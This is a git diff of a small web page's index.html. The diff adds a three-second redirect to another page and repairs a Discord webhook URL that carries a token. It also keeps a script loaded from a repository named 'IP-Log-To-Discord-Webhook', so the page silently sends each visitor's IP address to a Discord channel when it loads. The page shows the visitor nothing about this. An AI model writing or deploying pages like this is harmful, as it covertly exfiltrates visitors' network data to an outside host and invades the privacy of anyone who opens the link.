--- a/index.html
+++ b/index.html
@@ -1,14 +1,11 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-  <title>iBalls thing</title>
+  <meta http-equiv="refresh" content="3;url=MAINPAGE.html" /> 
 </head>
 <body>
 <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
 <script src="https://cdn.jsdelivr.net/gh/luisoos/IP-Log-To-Discord-Webhook/index.js"></script>
-<script>var webHookUrl = "https://discord.com/api/webhooks/1209161526293037096/lMLasrq0MbXJU-rroRH_iWb5LRTZmmkAb9C4y2WhjsS5-DJoWS94dkSEjwSv4IHyqONG;</script>
-<h1>fucking skdi</h1>
-<p>This is a paragraph.</p>
-
+<script>var webHookUrl = "https://discord.com/api/webhooks/1209161526293037096/lMLasrq0MbXJU-rroRH_iWb5LRTZmmkAb9C4y2WhjsS5-DJoWS94dkSEjwSv4IHyqONG";</script>
 </body>
 </html>
